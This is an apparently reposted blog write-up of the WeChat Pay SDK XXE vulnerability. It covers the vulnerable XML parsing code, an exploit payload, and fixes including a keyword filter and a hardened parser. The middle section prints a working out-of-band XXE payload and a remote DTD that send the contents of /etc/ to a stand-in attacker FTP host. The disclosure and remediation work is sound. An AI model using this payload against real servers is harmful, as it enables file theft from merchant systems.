WeChat Pay SDK XXE vulnerability traced: vulnerability analysis and principle

        Yesterday, a white hat signing as Rose Jackcode published a serious security vulnerability in the WeChat Pay SDK (an XXE vulnerability) on the foreign security community seclists. An attacker can craft malicious callback request data (in XML format) to read any file on the merchant's server, and even execute system commands remotely, leading to the merchant server being compromised.

        The WeChat Pay security team currently says the SDK has been updated to fix the known security vulnerability, and reminds merchants to update.

        Although the official WeChat Pay SDK online has been updated, the vulnerability lives in each merchant's own site system, so merchants need to download the latest SDK release and update their systems (or apply the remediation plan below themselves). A large number of WeChat Pay merchant systems therefore still carry this vulnerability, and the affected merchants need to update.

 

Let's look at how the WeChat Pay SDK vulnerability arises:

        What is an XXE vulnerability? XXE stands for XML External Entity attack, i.e. an XML External Entity vulnerability. An XML external entity definition can load content either locally or remotely.

        Affected version: WxPayAPI_JAVA_v3.zip (earlier versions should also be affected)

        The vulnerability is in the example presented in the SDK's README.md:

    String notifyData = "....";
    MyConfig config = new MyConfig();
    WXPay wxpay = new WXPay(config);
    // convert the callback XML to a map
    Map<String, String> notifyMap = WXPayUtil.xmlToMap(notifyData);
    ....

 

In WXPayUtil:

    public static Map<String, String> xmlToMap(String strXML) throws Exception {
        Map<String, String> data = new HashMap<String, String>();
        DocumentBuilderFactory documentBuilderFactory = DocumentBuilderFactory.newInstance();
        // No XXE protection: the factory keeps its defaults, so DOCTYPE declarations
        // and external entities in the callback XML are resolved by the parser.
        DocumentBuilder documentBuilder = documentBuilderFactory.newDocumentBuilder();
        InputStream stream = new ByteArrayInputStream(strXML.getBytes("UTF-8"));
        org.w3c.dom.Document doc = documentBuilder.parse(stream);
        ...
    }

 

How to simulate exploiting this vulnerability:

In the simulation, POST the following XML data to the merchant's callback URL:

 

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [ <!ENTITY % attack SYSTEM "file:///etc/">
<!ENTITY % hxt SYSTEM "http://attack:8080/shell/data.dtd";>
%hxt;
]>

 

http://attack:8080 is a server the attacker sets up themselves; data.dtd on it contains:

 

<!ENTITY % shell "<!ENTITY &#x25; upload SYSTEM 'ftp://attack:33/%attack; '>">
%shell;
%upload;

 

After the XXE attack is triggered, the merchant server sends the contents of /etc/ to the attacker's ftp://attack:33.

 

 

Remediation plans for merchants who do not have the latest SDK version:

Plan 1.

Disable external entities in WXPayUtil. After the line

    DocumentBuilderFactory documentBuilderFactory = DocumentBuilderFactory.newInstance();

add the following:

    documentBuilderFactory.setExpandEntityReferences(false);

 

Plan 2.

Filter the XML data submitted by users.

Keywords: <!DOCTYPE and <!ENTITY, or SYSTEM and PUBLIC.
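A hardened replacement for xmlToMap, added here as an example (it is not the SDK's own code) and following the OWASP XXE prevention guidance for DocumentBuilderFactory. One caveat worth knowing: setExpandEntityReferences(false) on its own only controls whether entity references in the document body are expanded in the DOM; the parameter entity (%hxt;) declared in the payload's DOCTYPE is still resolved while the DTD is read, so this example forbids the DOCTYPE outright and disables external entity loading in addition. The class name SafeWxXml and the sample callback body are assumptions.

```java
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;
import java.util.Map;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;
import org.xml.sax.SAXParseException;

public class SafeWxXml {

    // Hardened xmlToMap (added example, not the SDK's code): same input/output
    // shape as the vulnerable method, but the parser refuses any DTD.
    public static Map<String, String> xmlToMap(String strXML) throws Exception {
        Map<String, String> data = new HashMap<>();
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Primary defence (OWASP): no DOCTYPE at all, so neither the inline
        // <!ENTITY ...> nor the remote %hxt; parameter entity can be declared.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth, in case a different parser ignores the feature above.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        DocumentBuilder builder = f.newDocumentBuilder();
        InputStream stream = new ByteArrayInputStream(strXML.getBytes(StandardCharsets.UTF_8));
        Document doc = builder.parse(stream);
        doc.getDocumentElement().normalize();
        NodeList children = doc.getDocumentElement().getChildNodes();
        for (int i = 0; i < children.getLength(); i++) {
            Node n = children.item(i);
            if (n.getNodeType() == Node.ELEMENT_NODE) {
                data.put(n.getNodeName(), n.getTextContent());
            }
        }
        return data;
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample callback body, shaped like a WeChat Pay notify message.
        String ok = "<xml><return_code><![CDATA[SUCCESS]]></return_code><out_trade_no>T1</out_trade_no></xml>";
        System.out.println(xmlToMap(ok));
        // Constructed payload carrying a DOCTYPE (the shape used in the write-up above):
        // the hardened parser throws before any entity is declared or resolved.
        String bad = "<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY % attack SYSTEM \"file:///etc/\">]><xml/>";
        try { xmlToMap(bad); } catch (SAXParseException e) { System.out.println("rejected: " + e.getMessage()); }
    }
}
```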

 

 

 

Reproduced from: https://my.oschina.net/passerman/blog/1840218

Origin: blog.csdn.net/weixin_33752045/article/details/92066351